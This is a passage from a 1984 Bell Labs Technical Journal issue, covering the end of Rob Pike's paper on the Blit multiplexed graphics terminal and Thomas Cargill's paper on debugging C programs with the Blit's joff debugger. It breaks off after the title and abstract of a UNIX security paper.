Processes in the terminal may be loaded, by a procedure analogous to executing a UNIX program, to customize the terminal for a particular task. The programmer's interface to mpxterm is unaffected by other programs running in the terminal. To a rough approximation, the programming environment is a virtual machine: programs run as though they have a keyboard, mouse, display, and host RS-232 connection all to themselves.

The screen is multiplexed using the idea of a layer,3 which supports all bitmap operations, especially bitblt, on an extended bitmap data structure that allows overlap. Each Blit process has a global variable called display, which is the layer data structure for the portion of the screen occupied by the process. The display data structure contains the coordinates of the screen rectangle, used to clip graphics operations, and a list of off-screen bitmaps containing obscured contents of the layer. To the programmer, display is like an ordinary bitmap, obscured or not, and by executing graphics primitives on display the process can draw on its screen regardless of overlap, and without communicating with a window manager when the layer configuration changes. As far as the process is concerned, it has its portion of the screen to itself. There is no "window manager" in the conventional sense — bitblt* is the window interface.

Characters arriving from the host are split by the demultiplexer into separate streams and placed in the input queues of the appropriate processes.
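The demultiplexing step can be modeled with a toy routine. The message format below (a channel byte, a length byte, then data) is an assumption for illustration; real Blit messages also carry error-correction framing, which this sketch ignores. The point is only that one stream from the host fans out into per-process input queues.

```c
#include <string.h>

#define NCHAN 8
#define QSIZE 256

static char q[NCHAN][QSIZE];    /* one input queue per process */
static int  qlen[NCHAN];

/* Split a packed byte stream into per-channel input queues.
 * Returns the number of messages delivered, or -1 on a bad
 * channel number or an overfull queue. */
int demux(const unsigned char *buf, int n)
{
    int i = 0, delivered = 0;

    while (i + 2 <= n) {
        int chan = buf[i], len = buf[i + 1];

        if (i + 2 + len > n)            /* truncated final message */
            break;
        if (chan >= NCHAN || qlen[chan] + len > QSIZE)
            return -1;
        memcpy(q[chan] + qlen[chan], buf + i + 2, len);
        qlen[chan] += len;
        i += 2 + len;
        delivered++;
    }
    return delivered;
}
```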
From a process's point of view, the interface to the host is an ordinary byte stream. The keyboard is handled differently, because the stream of typed characters is directed at a process by the user. Still, the idea is the same: each process sees an ordinary byte stream from the keyboard and is oblivious to characters directed to other processes.

Character I/O in mpxterm is nonblocking. Two routines, kbdchar and hostchar, read characters from the input queues for the process. If no characters are available, they return an error indication but do not block, because typical terminal applications must be ready to receive input from either the host or the keyboard. When a process wants to suspend until characters become available, it calls wait with an argument bit vector stating which resources are of interest. wait returns a bit vector indicating which queues have data, so the inner loop of a typical terminal program is something like this:

        int resource;

        while (TRUE) {
                resource = wait(HOST|KBD);
                if (resource & HOST)
                        draw_on_screen(hostchar());
                if (resource & KBD)
                        sendchar(kbdchar());
        }

* The lbitblt primitive, discussed in the layers paper,3 is aliased to bitblt in the mpxterm programming environment, so the distinction between bitmaps and layers vanishes — the programmer treats layers exactly like bitmaps.

Sendchar sends characters to the host through the error-corrected channel. wait suspends the process, by calling another process that is ready to run, until a character becomes available on either queue and no other process is using the CPU. If no other process is ready, wait returns immediately when a character becomes available.
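A nonblocking read primitive of this kind is easy to sketch over an interrupt-fed ring buffer. NOCHAR, the queue layout, and the routine names are assumptions, not mpxterm's code; the real routines also cooperate with wait's bit vectors, which this sketch omits.

```c
#define NOCHAR (-1)
#define QSIZE  128

static unsigned char kbdq[QSIZE];
static int khead, ktail;        /* consumer and producer indices */

/* Interrupt side: drop a typed character into the queue. */
void kbdintr(int c)
{
    kbdq[ktail] = c;
    ktail = (ktail + 1) % QSIZE;
}

/* Process side: return the next character, or NOCHAR at once
 * if the queue is empty.  Never blocks, so the caller can poll
 * both the keyboard and the host queues. */
int kbdchar(void)
{
    int c;

    if (khead == ktail)
        return NOCHAR;
    c = kbdq[khead];
    khead = (khead + 1) % QSIZE;
    return c;
}
```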
Another system call, sleep, suspends a process for a specified number of ticks of the 60-Hz clock, by waiting for a timer set by a nonblocking alarm resource. sleep is roughly:

        sleep(n)
        int n;
        {
                alarm(n);       /* set the timer n ticks in the future */
                wait(ALARM);    /* suspend until timer fires */
        }

but includes protection in case the process has alarms pending. Since the hardware clock is coupled to the vertical retrace, sleep is often used to suspend a process until the picture it has placed in memory is visible on the screen.

Each process has a global data structure describing the mouse state — position and button status — that is updated asynchronously whenever the user has assigned the mouse to that process. A process may wait until it owns the mouse by calling

        wait(MOUSE)

Therefore, to wait for a button to be depressed, a process would execute

        while (mouse.buttons == 0)
                wait(MOUSE);

The following code draws line segments connecting mouse positions as the mouse moves:

        Point p, q;

        p = mouse.xy;   /* first point, where mouse points now */
        for (;;) {
                q = mouse.xy;
                segment(&display, p, q, OR);
                p = q;
                sleep(1);       /* wait for mouse and display update */
        }

The notation &display indicates that the address, rather than the value, of the display bitmap structure is passed to segment; OR specifies that the bit pattern of the line is to be OR'ed into display memory. Line segments are drawn half-open, so adjacent line segments share no points.

As well as I/O, all graphics primitives are implemented as system calls, to interface to the layer code but make everything look like ordinary bitmap graphics. Therefore, the system call interface must be very fast, or system call overhead will dominate graphics performance. Because there is no memory management, processes all live in the same address space, and system calls are indirect subroutine calls through a vector at a known location.
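The indirect-call linkage can be illustrated in C. Everything below is invented for illustration: the vector's contents, the stub bodies, and the macro names are assumptions, and on a real Blit the table would sit at a fixed, known address holding the kernel's entry points. The sketch only shows how a header file can make calls through a function-pointer table look like ordinary calls.

```c
/* syscall.h, hypothetical: user code sees ordinary call syntax,
 * but each call indirects through a table of function pointers. */
typedef int (*syscall_t)(int);

extern syscall_t sysvec[];      /* at a known, fixed address on a real Blit */

#define SYS_WAIT   0
#define SYS_ALARM  1

#define wait(mask)    (*sysvec[SYS_WAIT])(mask)
#define alarm(ticks)  (*sysvec[SYS_ALARM])(ticks)

/* Kernel side: stub implementations fill in the vector.  These
 * stubs just echo their argument so the linkage can be observed. */
static int do_wait(int mask)   { return mask; }
static int do_alarm(int ticks) { return ticks; }

syscall_t sysvec[] = { do_wait, do_alarm };
```

Because user code and kernel share one address space, this costs only the one extra indirection the paper mentions, and no trap instruction is needed.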
The execution penalty is only one extra instruction for a system call compared to an ordinary procedure call. The mapping to the vector is done from C by defining the system calls in a header file, so the mechanism is transparent to the programmer.

Programs are loaded into the Blit from the host computer's disc by a user program that communicates with a special program load process in the terminal. By default, a layer runs a conventional "dumb" terminal emulator. When the UNIX program executes a bootstrap ioctl request to initiate program loading, mpx transmits the request on a reserved communications channel. The Blit demultiplexer process shuts down the terminal emulator and begins the program loader process, which allocates memory, returns to the system the base address of the program, and then copies (asynchronously with the other terminal processes) the relocated program from its host queue into memory. Since the channel is error corrected, the loading protocol just relocates the program and writes, unformatted, the relocated binary; no checksumming or verification is necessary. When the loading is complete, the program begins executing. If it executes the exit system call, the layer remains active but is reinitialized with the dumb terminal emulator.

IX. RETROSPECTION, INTROSPECTION, AND CONCLUSIONS

The Blit has taught us that multiprogramming has been underused. A user is capable of running several related or unrelated programs in parallel if the user interface makes it easy to control their execution. The Blit has also shown the advantages of isolating the issues of user interaction from the operating system. All of the Blit software is user-level code, yet the Blit environment feels naturally coupled to the UNIX system. The system really knows nothing about the multiplexing going on; the user is just running more processes than usual.
A large part of the Blit's success can probably be attributed to our concentration on the graphics and user interface issues, rather than the development of a new integrated, distributed programming environment. There are a number of things worth noting that were done well on the Blit, and a number that could be improved. To end on an upbeat note, we will discuss the mistakes first.

Although the graphics is fast enough, the hardware is not big enough. That is, memory is tight when working on big programs, and there isn't enough offscreen bitmap storage. The greatest problem, though, is certainly the low bandwidth. Putting aside the issues of availability, simplicity, and portability, RS-232 is not fast enough for file I/O. The text editor must be written in two parts, using the terminal much like a cache. Consider context searches at 1200 baud, which would otherwise require sending the entire file, perhaps hundreds of thousands of characters long, over the phone line. Unfortunately, writing one program in two pieces is much harder than writing two programs. Still, we don't want local disc. The Blit model, using an inexpensive dedicated front end for high-quality interaction on a traditional time-sharing system, is a powerful one, and we prefer increasing the memory and bandwidth, leaving the basic structure the same, to adding disc and therefore expense, noise, and the proliferation of local copies of software.

Mpxterm does not exploit multiprogramming enough itself. Layers and terminal processes are one-to-one, counter to the current fads of message-based systems. There certainly needs to be more terminal IPC so, for example, text in one layer may be copied to another using the jim cut and paste operators. Perhaps most importantly, the current Blit software is tending towards disintegration: this layer is an editor and this layer is a debugger and this layer is a circuit design program.
This trend is counter to the uniformity of environments that makes a system easy to use, and misses some obvious simplifications. One obvious change would be to push text editing to a lower level, so text anywhere on the screen, not just in a jim layer, could be edited with the mouse. Mpxterm is currently being rewritten to support editing of displayed text.

Some things were done well. One of the Blit's competitive advantages was that the two people (Locanthi and Pike) who designed the hardware and software were the people who most wanted to use it. Both understood the hardware and software issues, and the hardware and software were designed together to work together, rather than by competing committees. Particularly in the design of the graphics memory, iterations of the hardware design were punctuated by writing test software to develop a feeling for the hardware/software trade-offs, and where best to resolve them. Finally, the bulk of the software was written by the same two people, and mpx and mpxterm were written by one (Pike).

Simplicity rules the Blit software. The operating system has no memory management and the simplest process structure possible. The user interface is devoid of the usual frills and bunting that decorate most graphics environments. For example, there is only one type of menu — a list of strings. Many menu styles can be envisioned, and they would certainly be used if implemented, but only one is necessary. The Blit graphics library is about 8K bytes of compiled code, of which over 3K is bitblt, texture, and the line-drawing primitives. This is a small fraction of the size of most interactive graphics systems.

The Blit is inexpensive. For little more than the cost of replacing the 24-by-80 terminals, everyone in our research center, including the support staff, has a Blit, and several have two. Also, replacing terminals is a simple way to migrate to a new environment.
The system underneath is still the same UNIX system, in fact — so nothing was left behind, and only new things had to be implemented. From the user's point of view, the Blit has brought about a far-reaching change in attitude: in conventional environments, even on sophisticated time-sharing systems, the user must often wait for the machine to complete some task such as a compilation. On the Blit, the machine is always ready to do something new — the user is in control, not the machine.

X. ACKNOWLEDGMENTS

Many people helped and influenced the development of the Blit. Most important among them is Bart Locanthi, who designed and built the terminal and much of the underlying graphics software. Piers Dick-Lauder wrote the error-correcting protocol in mpx and wrote the eighth edition version of mpx itself. Thanks are also due to Sally Browning, Tom Cargill, Greg Chesson, Joe Condon, Dave Ditzel, Steve Johnson, Andrew Hume, John Reiser, and Dennis Ritchie, each of whom provided indispensable assistance and enthusiastic encouragement.

REFERENCES

1. D. H. Ingalls, "The Smalltalk Graphics Kernel," Byte, 6 (August 1981), pp. 168-94.
2. R. Pike, B. N. Locanthi, and J. F. Reiser, "Hardware-Software Tradeoffs for Bitmap Graphics on the Blit," Software — Practice & Experience, 15 (March 1985).
3. R. Pike, "Graphics in Overlapping Bitmap Layers," Trans. Graph., 2, No. 2 (1983), pp. 135-60.
4. C. P. Thacker et al., "Alto: A Personal Computer," CSL-79-11, August 1979, Xerox Corp.
5. W. N. Joy, R. S. Fabry, and K. Sklower, UNIX 4.1BSD Programmer's Manual.
6. T. A. Cargill, "The Blit Debugger," J. Systems and Software, 3, No. 4 (December 1983), pp. 277-84.
7. R. Pike, unpublished work.
8. B. W. Kernighan, "Pic: A Language for Typesetting Graphics," Software — Practice & Experience, 12 (January 1982), pp. 1-20.
9. D. M. Ritchie, "The UNIX System: The Evolution of the UNIX Time-sharing System," AT&T Bell Lab. Tech. J., this issue.
AUTHOR

Rob Pike, AT&T Bell Laboratories, 1980—. As a Member of Technical Staff, Mr. Pike's best-known work has been as co-developer of the Blit bitmap graphics terminal. His research interests include statistical mechanics and cosmology; his practical interests involve interactive graphics hardware and software.

AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A.

The UNIX System: Debugging C Programs With the Blit

By T. A. CARGILL* (Manuscript received August 1, 1983)

The Blit terminal is changing the way we debug C programs. Using multiple virtual terminals on the Blit, a programmer can interact simultaneously with several of the tools needed when debugging. This makes existing tools more useful and influences the design of new tools. In particular, the Blit cleanly separates the programmer's communication with a debugger from communication with the program being debugged. Moreover, joff, a debugger for C programs that run in the Blit, demonstrates the advantage of operating a debugger asynchronously with the subject process and the effectiveness of a source-level user interface based on pop-up menus. The graphics user interface supports "pointer chasing" through arbitrary data structures and graphical display of graphics data objects.

I. INTRODUCTION

This paper begins with a synopsis of debugging technology (see surveys published by Model and Myers).1,2 This is followed by a discussion of the Blit terminal's effect on debugging C programs running under the UNIX™ operating system and then an example of joff, a debugger for C programs running on the Blit itself. The observations are pertinent to other languages used on UNIX systems, but only C has been used on the Blit. For programs on a UNIX system

* AT&T Bell Laboratories. Copyright © 1984 AT&T.
Photo reproduction for noncommercial use is permitted without payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permission. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor.

host, the multiplexed virtual terminals of the Blit increase the effectiveness of debugging with the standard tools. The Blit's hardware and software make its debugger quite unlike the debuggers used for UNIX programs. Several small scenarios illustrate tools and techniques used in debugging. (These examples are unrealistic and therefore require the reader to extrapolate to the effect in real debugging.) Some appreciation of the Blit terminal3 and a reading knowledge of C4 are assumed.

II. DEBUGGING TOOLS

Debugging is a complicated activity. A program isn't doing what it should, and the programmer has to find out what it is doing, so that the problem may be rectified or documented. Locating and understanding the errant part of the program is usually much harder than deciding how to correct the problem.

Initially, the programmer does not even know where to look; only the symptoms are known — the program's external behavior. The programmer constructs hypotheses about what may be wrong in the program and devises ways to test them. The results of each test are clues about the program that lead to other hypotheses. The more specific the hypotheses become, the more information the programmer needs about the internal behavior of the program, which is not normally observable. A debugger is a tool for observing the internal behavior of a program.
Generally, a debugger lets the programmer examine the state of the program at some point in its execution. Debuggers present the state of the subject program in different ways. They vary in the level of abstraction at which the program is viewed, from source programming language to machine language, and in the degree of user interaction:

• The most primitive debuggers give dumps: they print the contents of every memory location in the address space of the program at the time of a failure. The subject program executes no further; there is only information about its final state.
• Other debuggers trace the program: they print messages about selected events that occur in the execution of the program. Typical events are variable assignments and function calls. If the set of events must be fixed when the program is compiled or starts to run, the debugger is a batch tool, even if it runs in time sharing.
• Interactive debuggers involve the programmer in the execution of the program: when an event occurs the programmer enters a dialogue with the debugger and interactively examines the state of the program or modifies the set of events before restarting the program. The interactive nature is a great advantage; it is only after seeing the values of some variables that the programmer knows where to look for other critical data. Each run of the subject yields more information than it would with a batch debugger.

DEBUGGING WITH BLIT TERMINAL 55

The characteristics of a debugger are most influenced by the architecture of the machine executing the subject program; the machine architecture determines the ease with which the debugger can access and control the internal state of the program. An interpreter, a software machine, can easily provide ample support for a debugger. Hardware processors usually provide much less support.
For example, with an interpreter it may be easy to implement a class of events based on changes in the values of variables by invoking the debugger after the completion of each statement. Hardware processors vary but may provide no more than a breakpoint event, halting the program when it reaches a particular instruction.

Debuggers are also influenced by the architecture of their operating environment. Under an operating system that permits users to execute only a single process, the debugger and its subject must be merged into one process. Several reasons make it undesirable to combine the debugger and the subject into a single process:

1. The debugger's presence in the subject process may result in different behavior, even to the point where the bug is no longer apparent.
2. The debugger is not protected; the subject process may overwrite it.
3. If process address space is limited, there may not be room for the debugger.
4. If the debugger and the subject must be bound before the subject starts to execute, the debugger cannot be invoked after something goes wrong in a production program.

If possible, it is therefore better to make the debugger a separate process, supported by operating system primitives for accessing the subject process.

These reasons for making the debugger a separate process have more to do with the implementation of the debugger than with its use. The programmer still perceives the debugger and subject as united if communication with them is through a single terminal. To the programmer, the drawbacks of a shared terminal are:

1. The process involved with each line of input and output must be determined.
2. The shared terminal may not behave properly if the debugger and the subject require it to operate in different modes.
3. Even in the same mode, Input/Output (I/O) may not interleave properly because of unflushed buffers, cursor control, and so on.

The solution is to use two terminals, one for the debugger and one for the subject.
But whether the two processes can drive separate terminals depends on the operating system again, and also on the availability of terminals.

A debugger is only one of the tools used in debugging. The programmer uses a full set of software tools to manipulate a great deal of information: the source program, data files, test results, other programs, subroutine libraries, documentation, news bulletins, mail messages, etc. Even though experienced programmers write programs with debugging in mind, they can rarely plan much of how to tackle a particular bug. It is hard to anticipate the course of a debugging session or what information will be needed; the results of each step determine where to look, what to consider, and what tool to use next. A dextrous programmer may rapidly apply a wide variety of tools.

III. USING THE BLIT TO DEBUG UNIX PROGRAMS

The Blit can multiplex a number of UNIX system shells.3 Each shell runs in its own layer, a rectangular region of the screen that, by default, behaves like an ASCII terminal. The shells run asynchronously, writing to their respective layers at any time, ignorant of the multiplexing. The user creates, moves, reshapes, and deletes layers with a graphics mouse. The mouse also controls the way in which the layers overlap, and it selects the current layer, to which input from the keyboard is directed. Any obscured portion of an overlapped layer remains active; it can be written to at any time, and is restored when the layers are rearranged to make it reappear. The effect, for the user and the UNIX system alike, is as though the user had an array of terminals. A layer can also be tailored for an application with an arbitrary graphics program, downloaded from the UNIX system to run in the Blit's processor. For example, jim, a mouse-based multifile text editor, downloads its user interface process to a Blit layer.
The Blit has a considerable impact on debugging, even when no debugger is used, as in the ever-popular method of debugging C programs by inserting print statements. When a program is being debugged, the ability to run multiple streams of UNIX system commands simultaneously is useful because the programmer has to perform so many different tasks. The subject program can run in one layer while the source text of the program is viewed in another layer. Perusing the source text and following the behavior of the subject program simultaneously is a great help, even if the text editor only displays text from one file at a time. The text editor written for the Blit, jim, makes it possible to flip rapidly among as many as 20 files, and arrange the files in overlapping windows within its layer. In a layer occupying less than half of the Blit's 800 x 1024 pixel display, jim can show a block of source text with a function call from one source file, the body of the called function from another, and a set of definitions from a common header file.

None of the context of an editor or the subject program is lost when other tools must be used. Examples of the kind of tools that might be needed at any time are:

grep — to find occurrences of an identifier,
diff — to see how a file has changed,
man — to obtain a section of the UNIX system manual.

If executing a command takes a long time, the programmer need not wait for output before doing something else; each shell and tool responds independently. Without some discipline this can become chaotic, and it takes a little practice to use the Blit's layers to the best effect. Many programmers establish an idiosyncratic layout of the Blit screen, with fixed tools in layers at fixed positions. It is then easy to keep track of a few extra layers, handling other tasks as they arise.

Where they would not otherwise work, print statements can still be used for debugging on a Blit.
Consider using print statements to debug a conventional UNIX system screen editor running behind a Blit layer. (A Blit layer can be programmed to emulate an arbitrary ASCII terminal.) As the editor moves the cursor around the screen, print statement output will overwrite editor text and vice versa; the editor also will lose track of the cursor's location. However, on the Blit the trace can be directed to a different layer, as follows:

1. The debugging output is written to another stream, say the standard error device:

        fprintf(stderr, "keyboard() = %o\n", c);

2. The "pseudo-teletype" device associated with the layer to receive the trace is determined by using the tty command in that layer:

        $ tty
        /dev/pt/pt26

3. The editor's standard error output is directed to that device:

        $ editor 2>/dev/pt/pt26

The editor now executes in one layer and the trace output scrolls by in another layer; there is no interference. Flow control characters from the keyboard can stop and start the trace output to prevent it from scrolling away too quickly. Of course, stopping the output from the trace will not stop the editor until it blocks on full buffers.

In this case the print statements write unconditionally to the layer receiving the trace. A conditional trace is possible by adding a level of software to remove unwanted output. A file of directives, supplied by the programmer, can be used to control which print statements are active and which should be ignored. Checking the control file periodically to see if it has changed provides asynchronous control of the trace; the control file can be edited (in a third layer) while the program is running, to select dynamically which trace output is produced.

So far, there has been no mention of the UNIX system debuggers adb and sdb. These tools are functionally alike. Both debuggers examine dump files from aborted processes and interactively control the execution of processes to be debugged.
They differ in the level at which the subject program is interpreted: adb presents the program in terms of symbolic assembly language; sdb presents it in terms of its C source text. The UNIX system supports interactive debuggers as separate processes, but the subject must be a child process, created by the debugger. For adb and sdb, isolation of the subject's I/O is handled easily. Both debuggers have a run command to start the execution of the subject process. The command takes arguments to be passed to the process, including I/O redirection. So the standard I/O devices for the subject process can be chosen to make it communicate with another layer. As with the other examples, the UNIX system I/O abstraction makes the technique possible. The Blit merely places a personal set of asynchronous devices at the programmer's disposal.

IV. DEBUGGING BLIT PROGRAMS

C programs downloaded into the Blit must also be debugged. The Blit environment is quite unlike the UNIX system environment and affects the way Blit programs are debugged:

• Control flow in many Blit programs is driven by asynchronous input from the mouse, the keyboard, the clock, and a corresponding process on the host. This introduces some of the problems of debugging real-time software, particularly the difficulty of recreating conditions that produce an error. However, one classic bane of real-time programs is absent — response to interrupts is handled entirely by Blit system software.
• The primitive operations of the layer in which a program runs are those of bitmap graphics, not those of an ASCII terminal. A print statement only works if the program incorporates a set of output routines that interact properly with the graphics.
• The Blit has no memory management. Addressing errors may not be detected before a process has overwritten memory other than its own. However, one common addressing fault, indirection through location zero, is trapped by hardware.
• There is no preemptive scheduling.
A looping process seizes the processor; this prevents other processes from running. When this happens a special key on the keyboard must be used to kill the looping process.

The joff debugger is the principal tool for debugging Blit processes. It is described more fully in Ref. 5, which includes some details of its implementation. Joff is quite unlike the UNIX system debuggers in the way it interacts with the programmer and the subject process. It is invoked in its own layer before being bound to the subject process to be examined. In a layer the command

        joff

invokes the UNIX system process of joff, which immediately downloads the part of joff that runs in the Blit. Once loaded, joff is in an idle state with no layer to debug, indicated by the message in the status line at the top of its layer. The part of the display that has changed is underlined. The remainder of the joff layer scrolls text up the screen and off the top when it fills. A prompt character in the scrolling region invites a keyboard command. In fact, keyboard commands are used very little; all of the common commands are from the pop-up menu on the right-hand mouse button. At the outset, the menu is just:

        layer
        quit

If layer is picked, the cursor changes to a bullseye icon. Moving the bullseye to a layer and pressing the right-hand button selects the process running in that layer as the subject of joff. Assume the layer selected is running the Blit text editor, jim. By examining the arguments with which jim was invoked, joff attempts to determine the host object file from which the process was downloaded, in order to find the symbol tables. The name of the object file should be element 0 of a vector of arguments, known by convention as argv, passed to the function main.
This is printed in the scrolling area followed by a prompt, with the cursor switched to an icon calling for a menu selection:

        argv[0]
        none
        keyboard

The expected response is argv[0], but the other entries permit the special cases of proceeding without symbol tables, or entering the name of another file from the keyboard. Having successfully bound itself to jim, joff displays the state of its subject in the status line: in this case jim is running, that is, executing normally. If jim were stopped because of a run-time error or suspended by the down-loader before starting to execute, it would be selected as the subject in the same manner. The right button menu is now:

        layer
        quit
        breakpts
        globals
        halt

Notice that layer is still there; joff can be switched to another process at any time. Three new entries have appeared:

        breakpts: to set and clear breakpoints
        globals: to examine global variables
        halt: to suspend the subject process

A menu entry appears only when its use is valid. There is no need to breakpoint or halt jim before using globals to see the values of its global variables. Picking globals changes the menu on the right button to:

        Drect glb
        F_rectf glb
        Jdisplay glb
        Null glb
        P glb
        _string glb
        boxcurs glb
        bullseye glb
        butfunc glb
        complete glb
        current glb
        deadmouse glb

This shows only the top 12 items from a sorted list of the 40 global variables of jim. A scroll bar (not shown) beside the menu scrolls the 12-item window quickly through the full list. Each variable is identified as global by the glb tag; showing the class of each variable is needed to resolve ambiguity in some menus.
Picking a variable from this menu, for example, current, requests that its type and value be displayed; current is a pointer to the portion of text displayed from the file currently being edited by jim:

        running  argv[0] = /usr/blit/mbin/jim.m
        struct Textframe * : current=53180
        struct Textframe * : current?

Note that there was no need to refer to the source text of jim to find this variable. To compose this entire example I used only joff to feel around inside jim until I found interesting objects. Of course the blind alleys have been removed from the transcript. In general, it is quite practical to examine the data structures in a working program without reference to the source text. The value of current is a pointer to a Textframe† structure at address 53180. The prompt is an invitation to use a menu to construct an expression based on current, and examine the data structure. This menu begins:

        Textframe{~}
        ~->rect
        ~->scrollre
        ~->totalrec
        ~->str
        ~->s1
        ~->s2
        ~->scrolly
        ~->file
        ~->obscure

Each entry is an expression in which tilde represents the active expression, current. The rectangle where text is displayed is stored in the rect field of a Textframe structure, current->rect, selected by picking ~->rect:

        running  argv[0] = /usr/blit/mbin/jim.m
        struct Textframe * : current=53180
        struct Rectangle : current->rect?

Now the active expression is a Rectangle structure. No value has been shown; it is not a scalar or a pointer. There is a new prompt to extend the expression and the menu is:

        Rectangle{~}
        ~.origin
        ~.corner
        %outline(~)
        newframe(~)
        rXOR(~)

Rectangle{~}, at the top of the menu, is not a C expression. It is a request to display each field of the structure and its substructures, recursively.

† To ease reading, license is taken with the length of identifiers. In the symbol tables, all identifiers are truncated to eight characters.
The standard Blit representation of a rectangle is struct Rectangle:

        typedef struct Point {
                short x;
                short y;
        } Point;

        typedef struct Rectangle {
                Point origin;
                Point corner;
        } Rectangle;

Three functions, %outline(~), newframe(~), and rXOR(~), also appear in the menu, for reasons discussed below. Picking Rectangle{~} produces:

        running  argv[0] = /usr/blit/mbin/jim.m
        struct Textframe * : current=53180
        current->rect={origin={x=27, y=452}, corner={x=787, y=984}}
        struct Rectangle : current->rect?

This selection has not moved deeper into the data structure and current->rect reappears as the prompt, with the same menu. Picking ~.origin gives:

        running  argv[0] = /usr/blit/mbin/jim.m
        struct Textframe * : current=53180
        current->rect={origin={x=27, y=452}, corner={x=787, y=984}}
        struct Point : current->rect.origin?

and the menu for a Point:

        Point{~}
        ~.x
        ~.y
        %point(~)
        pttoframe(~)

In this menu, %point(~), and in the previous menu, %outline(~), are examples of functions built into joff for graphically displaying the standard Blit graphics data structures. A Point is shown graphically by flashing a cross hair at its position on the screen, and a Rectangle by drawing its outline in exclusive-or mode. Graphic display of graphics objects is the natural way to debug graphics programs; many bugs are immediately apparent. For example, it might be obvious from an image that a rectangle has been rotated and translated, an observation that might not emerge from the numeric coordinates. The Point menu also contains pttoframe(~). This is the function in jim that maps a screen position to a pointer to the Textframe covering the position; it determines to which of the jim files the mouse is pointing:

        Textframe *pttoframe(pt)
        Point pt;

This function is included by virtue of being applicable, that is, its only argument matches the type of the active expression.
In general, this brings into the menu many useful functions, such as coordinate transformers and special display functions. Picking pttoframe(~) makes pttoframe(current->rect.origin) the new active expression and evaluates it:

        running  argv[0] = /usr/blit/mbin/jim.m
        struct Textframe * : current=53180
        current->rect={origin={x=27, y=452}, corner={x=787, y=984}}
        struct Textframe * : pttoframe(current->rect.origin)=53180
        struct Textframe * : pttoframe(current->rect.origin)?

All is well; the pointer returned by pttoframe is the value of current, 53180.

Throughout this interaction with joff, jim continues to run: idling, waiting for mouse or keyboard input, its data structures unchanging. At any time it is possible to switch layers and interact with jim to manipulate it and see how it behaves. With jim executing asynchronously, joff does not try to present a consistent view of the internal state of jim; each expression is evaluated separately and reflects the values of the jim variables at the time of evaluation. To guarantee a consistent view, jim must be suspended, by using the halt or breakpts command from the main menu. Picking breakpts yields a menu containing the one hundred functions in jim, beginning:

        gcalloc()
        Rectf()
        Send()
        addstring()
        adjustnames()
        box()
        buttonhit()
        buttons()
        center()
        charofpt()
        closeall()
        closeframe()

Picking one of the functions, say box(), produces a further menu for setting breakpoints:

        call
        return
        both
        > none

The “>” tag on none indicates that no breakpoints have yet been set on box. Picking call sets a breakpoint on any call to box. Reshaping the current text frame in jim results in a call to box, to clear a rectangle and draw a border around it:

        box(t)
        Textframe *t;

Next, joff announces the breakpoint in the status line:

        argv[0] = /usr/blit/mbin/jim.m
        struct Textframe * : current=53180
        current->rect={origin={x=27, y=452}, corner={x=787, y=984}}
        struct Textframe * : pttoframe(current->rect.origin)=53180

Correctly, the box argument, t, has the same value as current. With jim suspended, the joff menu becomes richer. The new entries are:

        stmt step: to execute one source statement from the subject
        go: to restart the subject
        traceback: to list the functions on the call stack
        function: to select the current function from the call stack
        box() vars: to examine local variables in the current function, box()

A menu of local variables behaves like the menu of global variables. The current function can be changed by picking function from the main menu. This produces a menu of the functions on the call stack. Picking dodraw(), for example, makes it the current function; dodraw() vars then appears in the main menu and its local variables are accessible instead of those of box().

Though far from exhaustive, this demonstration of joff emphasizes the characteristics that make it an effective tool:
1. It is bound dynamically to an arbitrary subject process, in any state.
2. It executes asynchronously with its subject.
3. A simple, mouse-based user interface supports all the basic commands and expressions for “pointer chasing.”
4. Graphics data are displayed graphically.

V. DEBUGGING DISTRIBUTED PROGRAMS

Applications for the Blit are usually composed of two communicating processes, one running on the Blit processor and one running in the UNIX system. The example above ignored the other process of jim: managing the files on the host. There is no difficulty when both processes must be debugged simultaneously. Debugging the UNIX system process does not interfere with debugging the Blit process. None of the debugging techniques makes any assumption about what is happening elsewhere.
For example, if the UNIX system process is executed under sdb, and joff is applied to the Blit process, three layers are used: one for the application and two for debuggers. Neither debugger is aware of the other.

VI. CONCLUSION

Using the Blit to debug UNIX programs makes existing debugging tools and techniques more effective. The Blit's multiple virtual terminals make it easy to exploit the UNIX system's inherent character. Multiple shells help to handle the diversity of tasks involved in debugging. I/O on the UNIX system cleanly isolates debugging activity from the program's normal communications. A debugger for C programs on the Blit takes advantage of the Blit's hardware/software architecture to provide more function and a better user interface than the UNIX system debuggers. The Blit debugger is bound dynamically to a running process and then executes asynchronously beside it. With a menu-based user interface driven by the mouse, the keyboard is rarely needed, even when using expressions to examine complex data structures.

VII. ACKNOWLEDGMENTS

I wish to thank Brian Kernighan and Rob Pike for their comments on drafts of this paper.

REFERENCES

1. M. L. Model, “Monitoring Systems Behavior in a Complex Computational Environment,” CSL-79-1, Xerox Corp., 1979.
2. B. A. Myers, “Displaying Data Structures for Interactive Debugging,” CSL-80-7, Xerox Corp., 1980.
3. R. Pike, “The UNIX System: The Blit: A Multiplexed Graphics Terminal,” AT&T Bell Lab. Tech. J., this issue.
4. B. W. Kernighan and D. M. Ritchie, The C Programming Language, Englewood Cliffs, NJ: Prentice-Hall, 1978.
5. T. A. Cargill, “The Blit Debugger,” J. of Syst. Software, 3, No. 4 (December 1983), pp. 277-84.

AUTHOR

Thomas A. Cargill, B.S. (Mathematics/Computer Science), 1973, University of Reading, England; M. Math., 1975, and Ph.D. (Computer Science), 1979, University of Waterloo, Ontario; AT&T Bell Laboratories, 1982–. Mr.
Cargill was Assistant Professor at the University of Waterloo from 1980 to 1981. At AT&T Bell Laboratories he is a member of the Computing Science Research Center. His research interests are in software support for software development.

AT&T Bell Laboratories Technical Journal
Vol. 63, No. 8, October 1984
Printed in U.S.A.

The UNIX System:
UNIX Operating System Security

By F. T. GRAMPP* and R. H. MORRIS*
(Manuscript received February 7, 1984)

Computing systems that are easy to access and that facilitate communication with other systems are by their nature difficult to secure. Most often, though, the level of security that is actually achieved is far below what it could be. This is due to many factors, the most important of which are the knowledge and attitudes of the administrators and users of such systems. We discuss here some of the security hazards of the UNIX™ operating system, and we suggest ways to protect against them, in the hope that an educated community of users will lead to a level of protection that is stronger, but far more importantly, that represents a reasonable and thoughtful balance between security and ease of use of the system. We will not construct parallel examples for other systems, but we encourage readers to do so for themselves.

I. INTRODUCTION

